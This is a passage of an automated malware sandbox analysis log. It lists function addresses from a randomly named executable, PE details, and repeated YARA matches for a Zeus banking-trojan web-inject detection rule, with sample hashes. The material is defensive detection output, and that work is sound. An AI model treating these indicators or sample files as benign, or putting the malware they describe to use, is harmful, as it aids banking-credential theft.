    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00849B806_2_00849B80
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0085D3406_2_0085D340
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0085EC006_2_0085EC00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00857C106_2_00857C10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00855C306_2_00855C30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00829D306_2_00829D30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008506D06_2_008506D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0085C6D06_2_0085C6D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00862EDD6_2_00862EDD
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008696136_2_00869613
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008556506_2_00855650
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0085F7906_2_0085F790
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00823FA06_2_00823FA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0085DFA06_2_0085DFA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008617C06_2_008617C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0082F7E06_2_0082F7E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00829F506_2_00829F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0B2D09_2_02C0B2D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFF2D09_2_02BFF2D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C042509_2_02C04250
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C182139_2_02C18213
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C103C09_2_02C103C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD2BA09_2_02BD2BA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0E3909_2_02C0E390
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BDE3E09_2_02BDE3E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0CBA09_2_02C0CBA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD8B509_2_02BD8B50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0D8009_2_02C0D800
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C068109_2_02C06810
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C048309_2_02C04830
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD89309_2_02BD8930
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0F6209_2_02C0F620
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C066309_2_02C06630
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BF87809_2_02BF8780
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C117809_2_02C11780
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0BF409_2_02C0BF40
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C05CD09_2_02C05CD0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0FCF09_2_02C0FCF0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C0A4809_2_02C0A480
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02C144A09_2_02C144A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BED5709_2_02BED570
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F7A309_2_027F7A30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02800A209_2_02800A20
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FD3409_2_027FD340
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027E9B809_2_027E9B80
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_028058A09_2_028058A0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_028010F09_2_028010F0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F70D09_2_027F70D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FB8809_2_027FB880
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027DE9709_2_027DE970
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F56509_2_027F5650
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02802EDD9_2_02802EDD
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_028096139_2_02809613
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F06D09_2_027F06D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FC6D09_2_027FC6D0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C9F509_2_027C9F50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_028017C09_2_028017C0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027CF7E09_2_027CF7E0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C3FA09_2_027C3FA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FDFA09_2_027FDFA0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FF7909_2_027FF790
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F5C309_2_027F5C30
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027F7C109_2_027F7C10
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027FEC009_2_027FEC00
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C9D309_2_027C9D30
    Source: C:\Users\user\Desktop\arxtPs1STE.exeProcess token adjusted: SecurityJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 776
    Source: svchost.exe.0.drStatic PE information: Number of sections : 13 > 10
    Source: arxtPs1STE.exeStatic PE information: Number of sections : 13 > 10
    Source: arxtPs1STE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 2.3.svchost.exe.2c70000.17.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.883000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.889000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 20.2.tGYLgZxMWmmBTD.exe.2172000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 22.2.tGYLgZxMWmmBTD.exe.1280000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.38.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 26.2.tGYLgZxMWmmBTD.exe.12e2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 39.2.tGYLgZxMWmmBTD.exe.cb2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 24.2.tGYLgZxMWmmBTD.exe.a30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.50.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 20.2.tGYLgZxMWmmBTD.exe.2560000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.tGYLgZxMWmmBTD.exe.880000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 17.2.tGYLgZxMWmmBTD.exe.e70000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
